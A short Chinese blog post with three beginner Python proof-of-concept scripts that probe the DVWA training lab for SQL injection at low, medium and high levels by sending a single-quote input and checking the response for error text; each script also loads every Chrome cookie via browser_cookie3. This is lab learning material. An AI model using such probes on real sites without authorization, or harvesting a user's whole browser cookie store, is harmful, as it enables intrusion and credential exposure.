POC——DVWA's SQL Injection
最近开始尝试着自己写一些POC,从基础的DVWA靶场开始吧,不定时更新~
Level——low:
import requests import browser_cookie3 cookie = browser_cookie3.chrome() //获得了chrome全部的访问过的cookie,以后看看有没有什么方法只获取当前的,而且这个方法好像只有chrome可以,firefox不太行 response = requests.get("http://192.168.117.133/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie) re = 'syntax' flag=re in str(response.content) if flag: print("It looks likely vulnerable") else: print("It is strong")
Level——Medium
1 import requests 2 import browser_cookie3 3 4 cookie = browser_cookie3.chrome() 5 datas = {"id":"1'","Submit":"Submit"} //这里因为Content-Type:application/x-www-form-urlencoded,所以post构造为该模式(根据Payload内的值) 6 response = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie,data=datas) 7 8 re = 'syntax' 9 flag=re in str(response.content) 10 11 if flag: 12 print("It looks likely vulnerable") 13 else: 14 print("It is strong")
Level——High
1 import requests 2 import browser_cookie3 3 4 cookie = browser_cookie3.chrome() 5 datas = {"id":"1'","Submit":"Submit"} 6 response1 = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/session-input.php",cookies=cookie,data=datas) 7 response2 = requests.get("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/",cookies=cookie) //high中,查询和回显不在一个页面中,所以在这里分post查询和get获取页面 8 9 re = 'wrong' //这里换了特征语句 10 flag=re in str(response2.content) 11 12 if flag: 13 print("It looks likely vulnerable") 14 else: 15 print("It is strong")
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?